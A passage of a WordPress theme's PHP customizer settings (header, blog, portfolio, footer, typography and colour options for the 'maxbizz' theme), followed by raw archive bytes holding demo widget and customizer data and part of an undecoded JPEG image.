	 		'placeholder' => esc_attr__( 'Select a panel', 'maxbizz' ), 
	 		'choices'     => ( class_exists( 'Kirki_Helper' ) ) ? Kirki_Helper::get_posts( array( 'post_type' => 'ot_header_builders', 'posts_per_page' => -1 ) ) : array(),
		),
		'panel_left'     => array(
            'type'        => 'toggle',
			'label'       => esc_html__( 'Side Panel On Left', 'maxbizz' ),
            'section'     => 'main_header',
			'default'     => '0',
			'priority'    => 7,
        ),
        /*page header */
        'pheader_switch'  => array(
            'type'        => 'toggle',
            'label'       => esc_html__( 'Page Header On/Off', 'maxbizz' ),
            'section'     => 'page_header',
            'default'     => 1,
            'priority'    => 10,
        ),
        'breadcrumbs'     => array(
            'type'        => 'toggle',
            'label'       => esc_html__( 'Breadcrumbs On/Off', 'maxbizz' ),
            'section'     => 'page_header',
            'default'     => 1,
            'priority'    => 10,
            'active_callback' => array(
                array(
                    'setting'  => 'pheader_switch',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'left_bread'     => array(
            'type'        => 'toggle',
            'label'       => esc_html__( 'Breadcrumbs On Left', 'maxbizz' ),
            'section'     => 'page_header',
            'default'     => 0,
            'priority'    => 10,
            'active_callback' => array(
                array(
                    'setting'  => 'pheader_switch',
                    'operator' => '==',
                    'value'    => 1,
                ),
                array(
                    'setting'  => 'breadcrumbs',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'pheader_img'  => array(
            'type'     => 'image',
            'label'    => esc_html__( 'Background Image', 'maxbizz' ),
            'section'  => 'page_header',
            'default'  => '',
            'priority' => 10,
            'output'    => array(
                array(
                    'element'  => '.page-header',
                    'property' => 'background-image'
                ),
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'pheader_switch',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'pheader_color'    => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Background Color', 'maxbizz' ),
            'section'  => 'page_header',
            'priority' => 10,
            'output'    => array(
                array(
                    'element'  => '.page-header',
                    'property' => 'background-color'
                ),
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'pheader_switch',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'ptitle_color'    => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Title Color', 'maxbizz' ),
            'section'  => 'page_header',
            'priority' => 10,
            'output'    => array(
                array(
                    'element'  => '.page-header .page-title',
                    'property' => 'color'
                ),
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'pheader_switch',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'bread_color'    => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Breadcrumbs Color', 'maxbizz' ),
            'section'  => 'page_header',
            'priority' => 10,
            'output'    => array(
                array(
                    'element'  => '.page-header .breadcrumbs li, .page-header .breadcrumbs li a, .page-header .breadcrumbs li a:hover, .page-header .breadcrumbs li:before',
                    'property' => 'color'
                ),
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'pheader_switch',
                    'operator' => '==',
                    'value'    => 1,
                ),
                array(
                    'setting'  => 'breadcrumbs',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'pheader_height'  => array(
            'type'     => 'dimensions',
            'label'    => esc_html__( 'Page Header Height (Ex: 300px)', 'maxbizz' ),
            'section'  => 'page_header',
            'transport' => 'auto',
            'priority' => 10,
            'choices'   => array(
                'desktop' => esc_attr__( 'Desktop', 'maxbizz' ),
                'tablet'  => esc_attr__( 'Tablet', 'maxbizz' ),
                'mobile'  => esc_attr__( 'Mobile', 'maxbizz' ),
            ),
            'output'   => array(
                array(
                    'choice'      => 'mobile',
                    'element'     => '.page-header',
                    'property'    => 'height',
                    'media_query' => '@media (max-width: 767px)',
                ),
                array(
                    'choice'      => 'tablet',
                    'element'     => '.page-header',
                    'property'    => 'height',
                    'media_query' => '@media (min-width: 768px) and (max-width: 1024px)',
                ),
                array(
                    'choice'      => 'desktop',
                    'element'     => '.page-header',
                    'property'    => 'height',
                    'media_query' => '@media (min-width: 1024px)',
                ),
            ),
            'default' => array(
                'desktop' => '',
                'tablet'  => '',
                'mobile'  => '',
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'pheader_switch',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'head_size'  => array(
            'type'     => 'dimensions',
            'label'    => esc_html__( 'Page Title Size (Ex: 30px)', 'maxbizz' ),
            'section'  => 'page_header',
            'transport' => 'auto',
            'priority' => 10,
            'choices'   => array(
                'desktop' => esc_attr__( 'Desktop', 'maxbizz' ),
                'tablet'  => esc_attr__( 'Tablet', 'maxbizz' ),
                'mobile'  => esc_attr__( 'Mobile', 'maxbizz' ),
            ),
            'output'   => array(
                array(
                    'choice'      => 'mobile',
                    'element'     => '.page-header .page-title',
                    'property'    => 'font-size',
                    'media_query' => '@media (max-width: 767px)',
                ),
                array(
                    'choice'      => 'tablet',
                    'element'     => '.page-header .page-title',
                    'property'    => 'font-size',
                    'media_query' => '@media (min-width: 768px) and (max-width: 1024px)',
                ),
                array(
                    'choice'      => 'desktop',
                    'element'     => '.page-header .page-title',
                    'property'    => 'font-size',
                    'media_query' => '@media (min-width: 1024px)',
                ),
            ),
            'default' => array(
                'desktop' => '',
                'tablet'  => '',
                'mobile'  => '',
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'pheader_switch',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        /* blog settings */
		'blog_layout'           => array(
			'type'        => 'radio-image',
			'label'       => esc_html__( 'Blog Layout', 'maxbizz' ),
			'section'     => 'blog_page',
			'default'     => 'content-sidebar',
			'priority'    => 7,
			'description' => esc_html__( 'Select default sidebar for the blog page.', 'maxbizz' ),
			'choices'     => array(
				'content-sidebar' 	=> get_template_directory_uri() . '/inc/backend/images/right.png',
				'sidebar-content' 	=> get_template_directory_uri() . '/inc/backend/images/left.png',
				'full-content' 		=> get_template_directory_uri() . '/inc/backend/images/full.png',
			)
		),	
		'post_entry_meta'              => array(
            'type'     => 'multicheck',
            'label'    => esc_html__( 'Entry Meta', 'maxbizz' ),
            'section'  => 'blog_page',
            'default'  => array( 'date', 'author', 'comm' ),
            'choices'  => array(
                'date'    => esc_html__( 'Date', 'maxbizz' ),
                'author'  => esc_html__( 'Author', 'maxbizz' ),
                'comm'    => esc_html__( 'Comment', 'maxbizz' ),
            ),
            'priority' => 10,
        ),
        /* single blog */
        'single_post_layout'           => array(
            'type'        => 'radio-image',
            'label'       => esc_html__( 'Layout', 'maxbizz' ),
            'section'     => 'single_post',
            'default'     => 'content-sidebar',
            'priority'    => 10,
            'choices'     => array(
				'content-sidebar' 	=> get_template_directory_uri() . '/inc/backend/images/right.png',
				'sidebar-content' 	=> get_template_directory_uri() . '/inc/backend/images/left.png',
				'full-content' 		=> get_template_directory_uri() . '/inc/backend/images/full.png',
			)
        ),
        'ptitle_post'               => array(
			'type'            => 'text',
			'label'           => esc_html__( 'Page Title', 'maxbizz' ),
			'section'         => 'single_post',
			'default'         => esc_html__( 'Blog Single', 'maxbizz' ),
			'priority'        => 10,
		),
		'single_separator1'     => array(
			'type'        => 'custom',
			'label'       => esc_html__( 'Social Share', 'maxbizz' ),
			'section'     => 'single_post',
			'default'     => '<hr>',
			'priority'    => 10,
		),
        'post_socials'              => array(
            'type'     => 'multicheck',
            'section'  => 'single_post',
            'default'  => array( 'twitter', 'facebook', 'pinterest', 'linkedin' ),
            'choices'  => array(
                'twit'  	=> esc_html__( 'Twitter', 'maxbizz' ),
                'face'    	=> esc_html__( 'Facebook', 'maxbizz' ),
                'pint'     	=> esc_html__( 'Pinterest', 'maxbizz' ),
                'link'     	=> esc_html__( 'Linkedin', 'maxbizz' ),
                'google'  	=> esc_html__( 'Google Plus', 'maxbizz' ),
                'tumblr'    => esc_html__( 'Tumblr', 'maxbizz' ),
                'reddit'    => esc_html__( 'Reddit', 'maxbizz' ),
                'vk'     	=> esc_html__( 'VK', 'maxbizz' ),
            ),
            'priority' => 10,
        ),
        'single_separator2'     => array(
			'type'        => 'custom',
			'label'       => esc_html__( 'Entry Footer', 'maxbizz' ),
			'section'     => 'single_post',
			'default'     => '<hr>',
			'priority'    => 10,
		),
        'author_box'      => array(
			'type'        => 'checkbox',
			'label'       => esc_attr__( 'Author Info Box', 'maxbizz' ),
			'section'     => 'single_post',
			'default'     => true,
			'priority'    => 10,
		),
		'post_nav'     	  => array(
			'type'        => 'checkbox',
			'label'       => esc_attr__( 'Post Navigation', 'maxbizz' ),
			'section'     => 'single_post',
			'default'     => true,
			'priority'    => 10,
		),
		'related_post'    => array(
			'type'        => 'checkbox',
			'label'       => esc_attr__( 'Related Posts', 'maxbizz' ),
			'section'     => 'single_post',
			'default'     => true,
			'priority'    => 10,
        ),
        /* project settings */
		'portfolio_archive'           => array(
			'type'        => 'select',
			'label'       => esc_html__( 'Portfolio Archive', 'maxbizz' ),
			'section'     => 'portfolio_page',
			'default'     => 'archive_default',
			'priority'    => 1,
			'description' => esc_html__( 'Select page default for the portfolio archive page.', 'maxbizz' ),
			'choices'     => array(
				'archive_default' => esc_attr__( 'Archive page default', 'maxbizz' ),
				'archive_custom' => esc_attr__( 'Archive page custom', 'maxbizz' ),
			),
		),
		'archive_page_custom'     => array(
			'type'        => 'dropdown-pages',  
	 		'label'       => esc_attr__( 'Select Page', 'maxbizz' ), 
	 		'description' => esc_attr__( 'Choose a custom page for archive portfolio page.', 'maxbizz' ), 
	 		'section'     => 'portfolio_page', 
	 		'default'     => '', 
	 		'priority'    => 2,	 		
	 		'active_callback' => array(
				array(
					'setting'  => 'portfolio_archive',
					'operator' => '==',
					'value'    => 'archive_custom',
				),
			),
		),
		'portfolio_column'           => array(
			'type'        => 'select',
			'label'       => esc_html__( 'Portfolio Columns', 'maxbizz' ),
			'section'     => 'portfolio_page',
			'default'     => '3cl',
			'priority'    => 3,
			'description' => esc_html__( 'Select default column for the portfolio page.', 'maxbizz' ),
			'choices'     => array(
				'2cl' => esc_attr__( '2 Column', 'maxbizz' ),
				'3cl' => esc_attr__( '3 Column', 'maxbizz' ),
				'4cl' => esc_attr__( '4 Column', 'maxbizz' ),
			),
			'active_callback' => array(
				array(
					'setting'  => 'portfolio_archive',
					'operator' => '==',
					'value'    => 'archive_default',
				),
			),
		),
		'portfolio_style'           => array(
			'type'        => 'select',
			'label'       => esc_html__( 'Hover Style', 'maxbizz' ),
			'section'     => 'portfolio_page',
			'default'     => 'style1',
			'priority'    => 4,
			'description' => esc_html__( 'Select default style for the portfolio page.', 'maxbizz' ),
			'choices'     => array(
				'style1' => esc_attr__( 'Background Overlay', 'maxbizz' ),
				'style2' => esc_attr__( 'Background Solid', 'maxbizz' ),
				'style3' => esc_attr__( 'Hidden', 'maxbizz' ),
			),
			'active_callback' => array(
				array(
					'setting'  => 'portfolio_archive',
					'operator' => '==',
					'value'    => 'archive_default',
				),
			),
		),
		'portfolio_posts_per_page' => array(
			'type'        => 'number',
			'section'     => 'portfolio_page',
			'priority'    => 5,
			'label'       => esc_html__( 'Posts per page', 'maxbizz' ),			
			'description' => esc_html__( 'Change Posts Per Page for Portfolio Archive, Taxonomy.', 'maxbizz' ),
			'default'     => '',
			'active_callback' => array(
				array(
					'setting'  => 'portfolio_archive',
					'operator' => '==',
					'value'    => 'archive_default',
				),
			),
		),
		'pf_nav'     	  => array(
			'type'        => 'toggle',
			'label'       => esc_attr__( 'Projects Navigation On/Off', 'maxbizz' ),
			'section'     => 'portfolio_post',
			'default'     => 1,
			'priority'    => 7,
		),
		'pf_related_switch'     => array(
			'type'        => 'toggle',
			'label'       => esc_attr__( 'Related Projects On/Off', 'maxbizz' ),
			'section'     => 'portfolio_post',
			'default'     => 1,
			'priority'    => 7,
		),
		'pf_related_text'      => array(
			'type'            => 'text',
			'label'           => esc_html__( 'Related Projects Heading', 'maxbizz' ),
			'section'         => 'portfolio_post',
			'default'         => esc_html__( 'Related Projects', 'maxbizz' ),
			'priority'        => 7,
			'active_callback' => array(
				array(
					'setting'  => 'pf_related_switch',
					'operator' => '==',
					'value'    => 1,
				),
			),
		),
        /* footer settings */
		'footer_layout'     => array(
			'type'        => 'select',  
	 		'label'       => esc_attr__( 'Select Footer', 'maxbizz' ), 
	 		'description' => esc_attr__( 'Choose a footer for all site here.', 'maxbizz' ), 
	 		'section'     => 'footer', 
	 		'default'     => '', 
	 		'priority'    => 1,
	 		'placeholder' => esc_attr__( 'Select a footer', 'maxbizz' ), 
	 		'choices'     => ( class_exists( 'Kirki_Helper' ) ) ? Kirki_Helper::get_posts( array( 'post_type' => 'ot_footer_builders', 'posts_per_page' => -1 ) ) : array(),
		),
        'footer_fixed'  => array(
            'type'        => 'toggle',
            'label'       => esc_html__( 'Footer Fixed On/Off?', 'maxbizz' ),
            'section'     => 'footer',
            'default'     => 0,
            'priority'    => 2,
        ),
		'backtotop_separator'     => array(
			'type'        => 'custom',
			'label'       => '',
			'section'     => 'footer',
			'default'     => '<hr>',
			'priority'    => 3,
		),
		'backtotop'  => array(
            'type'        => 'toggle',
            'label'       => esc_html__( 'Back To Top On/Off?', 'maxbizz' ),
            'section'     => 'footer',
            'default'     => 1,
            'priority'    => 4,
        ),
        'bg_backtotop'    => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Background Color', 'maxbizz' ),
            'section'  => 'footer',
            'priority' => 5,
            'default'     => '',
            'output'    => array(
                array(
                    'element'  => '#back-to-top',
                    'property' => 'background',
                ),
            ),
            'active_callback' => array(
				array(
					'setting'  => 'backtotop',
					'operator' => '==',
					'value'    => 1,
				),
			),
        ),
        'color_backtotop' => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Color', 'maxbizz' ),
            'section'  => 'footer',
            'priority' => 6,
            'default'     => '',
            'output'    => array(
                array(
                    'element'  => '#back-to-top > i:before',
                    'property' => 'color',
                )
            ),
            'active_callback' => array(
				array(
					'setting'  => 'backtotop',
					'operator' => '==',
					'value'    => 1,
				),
			),
        ),
        'spacing_backtotop' => array(
            'type'     => 'dimensions',
            'label'    => esc_html__( 'Spacing', 'maxbizz' ),
            'section'  => 'footer',
            'priority' => 7,
            'default'     => array(
				'bottom'  => '',
				'right' => '',
			),
			'choices'     => array(
				'labels' => array(
					'bottom'  => esc_html__( 'Bottom (Ex: 20px)', 'maxbizz' ),
					'right'   => esc_html__( 'Right (Ex: 20px)', 'maxbizz' ),
				),
			),
            'output'    => array(
                array(
                    'choice'      => 'bottom',
                    'element'     => '#back-to-top.show',
                    'property'    => 'bottom',
                ),
                array(
                    'choice'      => 'right',
                    'element'     => '#back-to-top.show',
                    'property'    => 'right',
                ),
            ),
            'active_callback' => array(
				array(
					'setting'  => 'backtotop',
					'operator' => '==',
					'value'    => 1,
				),
			),
		),
		/* typography */
        'body_typo'    => array(
            'type'     => 'typography',
            'label'    => esc_html__( 'Body Font 1', 'maxbizz' ),
            'section'  => 'typography',
            'priority' => 10,
            'default'  => array(
                'font-family'    => '',
                'variant'        => '',
                'font-size'      => '',
                'line-height'    => '',
                'letter-spacing' => '',
                'text-transform' => '',
            ),
            'output'      => array(
                array(
                    'element' => 'body, p, button, input, select, optgroup, textarea, .font-main, .elementor-element .elementor-widget-text-editor, .elementor-element .elementor-widget-icon-list .elementor-icon-list-item',
                ),
            ),
        ),
        'second_font'    => array(
            'type'     => 'typography',
            'label'    => esc_html__( 'Body Font 2', 'maxbizz' ),
            'section'  => 'typography',
            'priority' => 10,
            'default'  => array(
                'font-family'  	 => '',
            ),
        ),
        'heading1_typo'                           => array(
            'type'     => 'typography',
            'label'    => esc_html__( 'Heading 1', 'maxbizz' ),
            'section'  => 'typography',
            'priority' => 10,
            'default'  => array(
                'font-family'    => '',
                'variant'        => '',
                'font-size'      => '',
                'line-height'    => '',
                'letter-spacing' => '',
                'text-transform' => '',
            ),
            'output'      => array(
                array(
                    'element' => 'h1, .elementor-widget.elementor-widget-heading h1.elementor-heading-title',
                ),
            ),
        ),
        'heading2_typo'                           => array(
            'type'     => 'typography',
            'label'    => esc_html__( 'Heading 2', 'maxbizz' ),
            'section'  => 'typography',
            'priority' => 10,
            'default'  => array(
                'font-family'    => '',
                'variant'        => '',
                'font-size'      => '',
                'line-height'    => '',
                'letter-spacing' => '',
                'text-transform' => '',
            ),
            'output'      => array(
                array(
                    'element' => 'h2, .elementor-widget.elementor-widget-heading h2.elementor-heading-title',
                ),
            ),
        ),
        'heading3_typo'                           => array(
            'type'     => 'typography',
            'label'    => esc_html__( 'Heading 3', 'maxbizz' ),
            'section'  => 'typography',
            'priority' => 10,
            'default'  => array(
                'font-family'    => '',
                'variant'        => '',
                'font-size'      => '',
                'line-height'    => '',
                'letter-spacing' => '',
                'text-transform' => '',
            ),
            'output'      => array(
                array(
                    'element' => 'h3, .elementor-widget.elementor-widget-heading h3.elementor-heading-title',
                ),
            ),
        ),
        'heading4_typo'                           => array(
            'type'     => 'typography',
            'label'    => esc_html__( 'Heading 4', 'maxbizz' ),
            'section'  => 'typography',
            'priority' => 10,
            'default'  => array(
                'font-family'    => '',
                'variant'        => '',
                'font-size'      => '',
                'line-height'    => '',
                'letter-spacing' => '',
                'text-transform' => '',
            ),
            'output'      => array(
                array(
                    'element' => 'h4, .elementor-widget.elementor-widget-heading h4.elementor-heading-title',
                ),
            ),
        ),
        'heading5_typo'                           => array(
            'type'     => 'typography',
            'label'    => esc_html__( 'Heading 5', 'maxbizz' ),
            'section'  => 'typography',
            'priority' => 10,
            'default'  => array(
                'font-family'    => '',
                'variant'        => '',
                'font-size'      => '',
                'line-height'    => '',
                'letter-spacing' => '',
                'text-transform' => '',
            ),
            'output'      => array(
                array(
                    'element' => 'h5, .elementor-widget.elementor-widget-heading h5.elementor-heading-title',
                ),
            ),
        ),
        'heading6_typo'                           => array(
            'type'     => 'typography',
            'label'    => esc_html__( 'Heading 6', 'maxbizz' ),
            'section'  => 'typography',
            'priority' => 10,
            'default'  => array(
                'font-family'    => '',
                'variant'        => '',
                'font-size'      => '',
                'line-height'    => '',
                'letter-spacing' => '',
                'text-transform' => '',
            ),
            'output'      => array(
                array(
                    'element' => 'h6, .elementor-widget.elementor-widget-heading h6.elementor-heading-title',
                ),
            ),
        ),

		/* 404 */
		'page_404'   	  => array(
			'type'        => 'dropdown-pages',  
	 		'label'       => esc_attr__( 'Select Page', 'maxbizz' ), 
	 		'description' => esc_attr__( 'Choose a custom page for page 404.', 'maxbizz' ),
	 		'placeholder' => esc_attr__( 'Select a page 404', 'maxbizz' ), 
	 		'section'     => 'error_404', 
	 		'default'     => '', 
			'priority'    => 3,
		),

		/*color scheme*/
        'bg_body'      => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Background Body', 'maxbizz' ),
            'section'  => 'color_scheme',
            'default'  => '',
            'priority' => 10,
            'output'   => array(
                array(
                    'element'  => 'body, .site-content',
                    'property' => 'background-color',
                ),
            ),
        ),
        'main_color'   => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Primary Color', 'maxbizz' ),
            'section'  => 'color_scheme',
            'default'  => '#fe8423',
            'priority' => 10,
        ),

        /*google atlantic*/
        'js_code'  => array(
            'type'        => 'code',
            'label'       => esc_html__( 'Code', 'maxbizz' ),
            'section'     => 'script_code',
            'choices'     => [
				'language' => 'js',
			],
            'priority'    => 3,
        ),
		
	);
	$settings['panels']   = apply_filters( 'maxbizz_customize_panels', $panels );
	$settings['sections'] = apply_filters( 'maxbizz_customize_sections', $sections );
	$settings['fields']   = apply_filters( 'maxbizz_customize_fields', $fields );

	return $settings;
}

$maxbizz_customize = new Maxbizz_Customize( maxbizz_customize_settings() );PK�8FZt���%inc/backend/data/business/widgets.wienu�[���{"primary":{"author_widget-2":{"title":"Tina Moriss","text":"She is the CEO. She's a big fan her cat Tux, & dinner parties","image":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/uploads\/sites\/7\/2020\/09\/author-widget.png","facebook":"#","twitter":"#","google":"","linkedin":"#","pinterest":"","instagram":"#","youtube":"","dribbble":""},"search-3":{"title":""},"categories-3":{"title":"","count":1,"hierarchical":0,"dropdown":0},"recent_news-2":{"title":"Recent Posts","count":1,"posts_per_page":"3"},"tag_cloud-2":{"title":"Tags","count":0,"taxonomy":"post_tag"},"media_image-2":{"size":"full","width":270,"height":300,"caption":"","alt":"","link_type":"custom","link_url":"","image_classes":"","link_classes":"","link_rel":"","link_target_blank":false,"image_title":"","attachment_id":1744,"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/wp-content\/uploads\/sites\/9\/2020\/11\/bannner-widget-home3.jpg","title":""}}}PK�8FZ�:a+�
�
(inc/backend/data/business/customizer.datnu�[���a:4:{s:8:"template";s:7:"maxbizz";s:4:"mods";a:21:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:9:"body_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:11:"second_font";a:5:{s:11:"font-family";s:7:"Raleway";s:11:"font-backup";s:0:"";s:7:"variant";s:7:"regular";s:11:"font-weight";i:400;s:10:"font-style";s:0:"";}s:13:"heading1_typo";a:9:{s:11:"font-family";s:7:"Raleway";s:7:"variant";s:3:"600";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:600;s:10:"font-style";s:6:"normal";}s:13:"heading2_typo";a:9:{s:11:"font-family";s:7:"Raleway";s:7:"variant";s:3:"600";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:600;s:10:"font-style";s:6:"normal";}s:13:"heading3_typo";a:9:{s:11:"font-family";s:7:"Raleway";s:7:"variant";s:3:"600";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:600;s:10:"font-style";s:6:"normal";}s:13:"heading4_typo";a:9:{s:11:"font-family";s:7:"Raleway";s:7:"variant";s:3:"600";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:600;s:10:"font-style";s:6:"normal";}s:13:"heading5_typo";a:9:{s:11:"font-family";s:7:"Raleway";s:7:"variant";s:3:"600";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:600;s:10:"font-style";s:6:"normal";}s:13:"heading6_typo";a:9:{s:11:"font-family";s:7:"Raleway";s:7:"variant";s:3:"600";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:600;s:10:"font-style";s:6:"normal";}s:13:"header_layout";s:3:"182";s:13:"header_mobile";s:2:"77";s:16:"sidepanel_layout";s:0:"";s:13:"footer_layout";s:3:"300";s:10:"main_color";s:7:"#d92300";s:11:"pheader_img";s:94:"http://wpdemo.archiwp.com/maxbizz-business/wp-content/uploads/sites/9/2020/12/pheader-blog.jpg";s:7:"preload";b:1;s:12:"preload_logo";s:90:"http://wpdemo.archiwp.com/maxbizz-business/wp-content/uploads/sites/9/2020/12/03_White.svg";s:18:"preload_text_color";s:7:"#ffffff";s:15:"preload_bgcolor";s:7:"#282828";}s:7:"options";a:2:{s:9:"site_icon";s:4:"1761";s:23:"nav_menus_created_posts";a:0:{}}s:6:"wp_css";s:0:"";}PK�8FZ���$?
?
#inc/backend/data/business/home3.jpgnu�[������ExifII*��Ducky2���http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.did:49E70F5D48C111EB9CD8B78C8BD0042E" xmpMM:InstanceID="xmp.iid:49E70F5C48C111EB9CD8B78C8BD0042E" xmp:CreatorTool="Adobe Photoshop 21.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a2f60378-c847-1d41-be85-22d381388240" stRef:documentID="adobe:docid:photoshop:280fad93-38ff-f04f-a894-edd0a46ac3b4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����







#"""#''''''''''		
			




!! !!''''''''''��#�"���	
	
s!1AQa"q�2���B#�R��3b�$r��%C4S���cs�5D'���6Tdt���&�	
��EF��V�U(�������eu�������fv�������7GWgw�������8HXhx�������)9IYiy�������*:JZjz�������m!1AQa"q��2������#BRbr�3$4C��S%�c��s�5�D�T�	
&6E'dtU7��()��󄔤�����eu�������FVfv�������GWgw�������8HXhx�������9IYiy�������*:JZjz��������?�f�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]��F�[�m���!��Clӈ�i�XzBFd�;J��+���I 8�re����,R�cȓ�9
G�͆7�i�ϬZ���#yZ~�ק��ۮ��G�5�;Z����t掫Qt��w�B�^�c���ë�)y��������'�����E	�v�X�H�=�`��7���La%ڼ���C�aY�>�61V5�j:u�{6���`����& �$�T���\Uٳf�]�6lUٳf�]�6lUٳf�]�6lUٳb�m#[�ȧn$w�pJB5�j��y3�9��"e�#]#�(�͒��t	�G]IaX��-hV6����_�ݰ�b��H��o=��QY`-'�H !<��aA�Mk�o/�m4���I$��VSB�?����͒s�i���"J!B���T"P�v��q!��z���$߼�=hÅZ<hp^��Riژ�͒q��Gv��1�y3`V�.���k�v��
��H��Ej;"���-OLU-͛6*�ؤ0��h(31�w'4м��j+)� �#�.Ut��d�^�u����d�M��K��k�J�U�1Th�T}�m$R>F����RK�,�ڳWՏ��P��]����Mlk6J��ǨI����i�V�#�*�ο�I�`����I���4����yҪj>�!M�V��X�yR�"Wa��(4V�F'��6lث�f͊�6lV;vu��UOB�ޝN��0JB"ɦP�)����K6;�ōhO]�rR��;�il��H����G��5I/AQ��-��l����\��yn.LrD�j�u��V��`�m�	�F���~���1��_��K�4ߧ��X�l��kKX/nl���zq�aS�7�O��GEХ��_��˒�AJ$l7v�A'~���X�l�>���r����D�>�8ߋG�9��Uٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�2��ڋ��5.”SL/͂B�E��d��G'�	�[��{.o0Z�k5�P2HDW�"���xI�]�v����(�����6Q
.8Ld��$��S��vƧ>	`��c(�{�2��)��~bh׷p^ک�2�M$ Mt-eH����T�S\b��A���Q�n�u�x�uH�~b�4�7!}I�?N�
������5s!�=2����--��Sjc��E�J4�t��?#��׉ pQL`����<Z��i�M��O��Պ�wDe����L�����T�9ͫ���7W�9�;�����$���)I%-�wRX�O��\��]�5sWvl��\UٳW5qWf�\��]�5sWvl��\U�&�T1���R9!�Xx�
\���"B�܈#�#�lŔ��A��!R���w0�	=T*!M��m�K�3�\��\]G��Ȏ����%y�P���#��\b���FY�s���b"ȏ���?�V��.���8��ZYDL����ZGBEF��&���9�
N�[�[;q�X���8.��xW��,�ERԢ�L�W5rL��䤴���p���=9���8Q�� +4��\��wA���mMFM7�ؑ%�#�K�bC�/Ć�E٘�,������=#���[�Iy
ʵ���@�
=U�'Eh�Q��J'!������f�j⨋9#IJ�Ԡ���A�$���Q;�$�z�W�ijuU���o�Ŀ/�z�q_z�������a.��qvZ�t�t���5���F����XFKm�Tc�|�a}������ٔ�D���i�e����T��W5rƆk���w��I�FXP���Q��҆��ٛȓZ��S�N!XZ(��5�\I@C��c��\��oAR!U�\U��^E[8T�*�hon#�ȑ��GV�79q��nz�MG�����T�-��g��ȷ��<�:q��H�$�؆�Eu40�M�;�T�PU�XH���@w��$�-bISCŁVv �����M�X�ya#�\�ۼ�J���,%�ɕ���߈�����b������� ��xa�eۋ*L|&��r\��S1h2yz�9gY�XVr�Qɝ(	�C�n��Fj�*���#' 
:H@$�����\���)�OD�ح�w��*LT�x�JP�<@�2}y�o
�4Vwr.Dp��Vhv���%�~a�KS9�sW��r┤v�$��k>[�Is�h�BIPƨ��0崂��a����o!Ki'��h����b�;������qZ0��Ќ��5p�e:W�d���DOt�(JB��4�,RNHx���
���x���^�kawt���'Vb�9Z�~��� #ߩ���j⬛˞Z��并����<��RG��Q=J�:q�OÆ��F�c�z�Z"�K��*qS*Z��D+VǏ�@��P ��\U��Ga�_X��H�n%�$4�,nP6�n͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWa��a���\������NJ�H��Z�P��ɿ���V�}1W��ʇ��_�6�'�*��۩��?�:�j�ͮ��	VJ�r1'>ś��)�&�(BS���<��y���o(�n��#`��|�򡼡�-��������x�e��`�z��+Ѻ�+ۦ��n0e��cy��	$0�$��&�S���NА'Ȳ��R� ;�H7��
